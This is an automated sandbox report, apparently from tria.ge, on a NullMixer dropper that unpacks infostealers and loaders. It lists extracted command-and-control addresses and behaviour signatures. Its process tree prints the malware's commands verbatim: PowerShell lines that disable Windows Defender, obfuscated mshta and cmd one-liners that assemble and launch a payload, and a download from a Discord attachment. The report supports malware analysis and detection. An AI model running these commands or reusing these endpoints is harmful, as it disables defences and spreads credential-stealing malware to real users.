Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/11/2024, 18:26 UTC

General

  • Target

    a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe

  • Size

    4.4MB

  • MD5

    bfc2137972c74edea0f9791b94486e9b

  • SHA1

    fd72e52406ce3f2ae5cfdb5dd8c7243f3ce31eb3

  • SHA256

    a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4

  • SHA512

    9fcd3756f9888e2000b94caf0d803087497b87428c0bd641901d2e416411bc698d9ca3a7a00d3cd711b681f3c8b8921f2a478f0ec1f975bc36fde5cf16741e75

  • SSDEEP

    98304:J3y6Uegpc50QDGUFSggME8k3XwPKHPpNJNJ95hJJoSuqgq:J3y6O3R/gt/kHGQLJb9jJJoSuQ

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

nullmixer

C2

http://wensela.xyz/

Extracted

Family

redline

Botnet

fucker2

C2

135.181.129.119:4805

Attributes
  • auth_value

    b69102cdbd4afe2d3159f88fb6dac731

Extracted

Family

redline

Botnet

media18

C2

91.121.67.60:2151

Attributes
  • auth_value

    e37d5065561884bb54c8ed1baa6de446

Extracted

Family

gcleaner

C2

gcl-gb.biz

45.9.20.13

Extracted

Family

redline

Botnet

Chris

C2

194.104.136.5:46013

Attributes
  • auth_value

    9491a1c5e11eb6097e68a4fa8627fda8

Extracted

Family

privateloader

C2

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • Nullmixer family
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Onlylogger family
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Privateloader family
  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V1 payload 1 IoCs
  • Raccoon family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 3 IoCs
  • Sectoprat family
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars family
  • Socelars payload 1 IoCs
  • OnlyLogger payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Blocklisted process makes network request 4 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
    "C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5108
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2016
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:740
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3880
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3236
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue200ab8d408d.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3164
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue200ab8d408d.exe
            Tue200ab8d408d.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue201d50e7015.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:428
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue201d50e7015.exe
            Tue201d50e7015.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1840
            • C:\Users\Admin\AppData\Local\Temp\is-NLED4.tmp\Tue201d50e7015.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-NLED4.tmp\Tue201d50e7015.tmp" /SL5="$60112,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue201d50e7015.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2644
              • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue201d50e7015.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue201d50e7015.exe" /SILENT
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:508
                • C:\Users\Admin\AppData\Local\Temp\is-38LOB.tmp\Tue201d50e7015.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-38LOB.tmp\Tue201d50e7015.tmp" /SL5="$80286,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue201d50e7015.exe" /SILENT
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:4656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue2082eedf21.exe /mixone
          4⤵
          • System Location Discovery: System Language Discovery
          PID:620
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue2082eedf21.exe
            Tue2082eedf21.exe /mixone
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            PID:2976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue207c76c7f37.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1504
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue207c76c7f37.exe
            Tue207c76c7f37.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:5080
            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue207c76c7f37.exe
              C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue207c76c7f37.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4652
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue20adee3c26d.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20adee3c26d.exe
            Tue20adee3c26d.exe
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3984
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ( "WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20adee3c26d.exe"" > ..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If """"== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20adee3c26d.exe"" ) do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:3944
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20adee3c26d.exe" >..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If ""== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20adee3c26d.exe" ) do taskkill /IM "%~nXY" -f
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3168
                • C:\Users\Admin\AppData\Local\Temp\_4SO.EXE
                  ..\_4SO.Exe /PZOIMJIYi~u3pALhs
                  8⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:4604
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ( "WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" > ..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If ""/PZOIMJIYi~u3pALhs""== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" ) do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
                    9⤵
                    • Checks computer location settings
                    • System Location Discovery: System Language Discovery
                    PID:4616
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" >..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If "/PZOIMJIYi~u3pALhs"== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" ) do taskkill /IM "%~nXY" -f
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1424
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" vBsCripT: clOsE ( crEatEobJECT ( "WSCRIPt.SHELL" ). RUn ( "cMD.exE /q /C ecHo | SET /p = ""MZ"" >5~XZ.D & COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q * " , 0 , tRue ) )
                    9⤵
                    • Checks computer location settings
                    • System Location Discovery: System Language Discovery
                    PID:3632
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /q /C ecHo | SET /p = "MZ" >5~XZ.D &COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q *
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1052
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" ecHo "
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:624
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>5~XZ.D"
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:1736
                      • C:\Windows\SysWOW64\msiexec.exe
                        msiexec -y ..\WOYVBnm.9
                        11⤵
                        • Loads dropped DLL
                        • Blocklisted process makes network request
                        • System Location Discovery: System Language Discovery
                        PID:4616
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /IM "Tue20adee3c26d.exe" -f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1144
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue20ea834764a6.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3100
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20ea834764a6.exe
            Tue20ea834764a6.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4128
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue20abd30733a17.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:224
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20abd30733a17.exe
            Tue20abd30733a17.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue2076b72c2666aa9c.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2744
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue2076b72c2666aa9c.exe
            Tue2076b72c2666aa9c.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:532
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue202dc71d1d41.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:408
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue202dc71d1d41.exe
            Tue202dc71d1d41.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue20d8f1968de62f282.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3960
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20d8f1968de62f282.exe
            Tue20d8f1968de62f282.exe
            5⤵
            • Executes dropped EXE
            PID:4696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue203dd57461.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2984
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue203dd57461.exe
            Tue203dd57461.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2788
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue20c79bfdadc.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4412
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20c79bfdadc.exe
            Tue20c79bfdadc.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1040
            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20c79bfdadc.exe
              C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20c79bfdadc.exe
              6⤵
              • Executes dropped EXE
              PID:2676
            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20c79bfdadc.exe
              C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue20c79bfdadc.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue2082ea84bd.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1424
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue2082ea84bd.exe
            Tue2082ea84bd.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2172
            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue2082ea84bd.exe
              C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue2082ea84bd.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3356
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue205724605816e79.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1316
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue205724605816e79.exe
            Tue205724605816e79.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks SCSI registry key(s)
            PID:3872
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 360
              6⤵
              • Program crash
              PID:3092
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue2095db5b6bd7.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1248
          • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue2095db5b6bd7.exe
            Tue2095db5b6bd7.exe
            5⤵
            • Executes dropped EXE
            • Drops Chrome extension
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2360
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im chrome.exe
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4084
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im chrome.exe
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4056
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe"
              6⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2568
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc292bcc40,0x7ffc292bcc4c,0x7ffc292bcc58
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4700
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1592 /prefetch:2
                7⤵
                  PID:3964
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:3
                  7⤵
                    PID:2144
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8
                    7⤵
                      PID:4356
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:1
                      7⤵
                        PID:2732
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
                        7⤵
                          PID:4384
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3144,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4516 /prefetch:1
                          7⤵
                            PID:1088
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4700,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8
                            7⤵
                              PID:2652
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3692 /prefetch:8
                              7⤵
                                PID:4880
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4020,i,7589088867777144939,5079188854776020618,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8
                                7⤵
                                  PID:4056
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 620
                            4⤵
                            • Program crash
                            PID:4592
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3364 -ip 3364
                      1⤵
                        PID:1396
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3872 -ip 3872
                        1⤵
                          PID:4484
                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                          1⤵
                            PID:4252
                          • C:\Windows\system32\dwm.exe
                            "dwm.exe"
                            1⤵
                            • Checks SCSI registry key(s)
                            • Enumerates system info in registry
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1596
                          • C:\Windows\system32\dwm.exe
                            "dwm.exe"
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2888
                          • C:\Windows\system32\dwm.exe
                            "dwm.exe"
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4996
                          • C:\Windows\system32\dwm.exe
                            "dwm.exe"
                            1⤵
                              PID:2372

                            Network

                            • flag-us
                              DNS
                              196.249.167.52.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              196.249.167.52.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              20.160.190.20.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              20.160.190.20.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              wensela.xyz
                              setup_install.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              wensela.xyz
                              IN A
                              Response
                            • flag-us
                              DNS
                              95.221.229.192.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              95.221.229.192.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              www.listincode.com
                              Tue2095db5b6bd7.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              www.listincode.com
                              IN A
                              Response
                              www.listincode.com
                              IN CNAME
                              expired.namebright.com
                              expired.namebright.com
                              IN CNAME
                              cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                              cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                              IN A
                              52.203.72.196
                              cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                              IN A
                              54.84.177.46
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              cdn.discordapp.com
                              Tue20abd30733a17.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              cdn.discordapp.com
                              IN A
                              Response
                              cdn.discordapp.com
                              IN A
                              162.159.135.233
                              cdn.discordapp.com
                              IN A
                              162.159.133.233
                              cdn.discordapp.com
                              IN A
                              162.159.129.233
                              cdn.discordapp.com
                              IN A
                              162.159.130.233
                              cdn.discordapp.com
                              IN A
                              162.159.134.233
                            • flag-us
                              DNS
                              niemannbest.me
                              Tue203dd57461.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              niemannbest.me
                              IN A
                              Response
                            • flag-us
                              GET
                              https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe
                              Tue20abd30733a17.exe
                              Remote address:
                              162.159.135.233:443
                              Request
                              GET /attachments/897184039432257628/900114690296914032/pctool.exe HTTP/1.1
                              Host: cdn.discordapp.com
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Wed, 06 Nov 2024 18:26:45 GMT
                              Content-Type: text/plain;charset=UTF-8
                              Content-Length: 36
                              Connection: keep-alive
                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                              Set-Cookie: __cf_bm=_dFcqEnp07s55loGzLDH6bke_vWRrGFI16M2mSSbDws-1730917605-1.0.1.1-20Gq146h2NhRFbU2DKdht282T83zQeaESnrMZZbhyIez9uDtqt4eSGNuvnf3WunIJNMu1lqmZ4hoeRlmGGtsMg; path=/; expires=Wed, 06-Nov-24 18:56:45 GMT; domain=.discordapp.com; HttpOnly; Secure
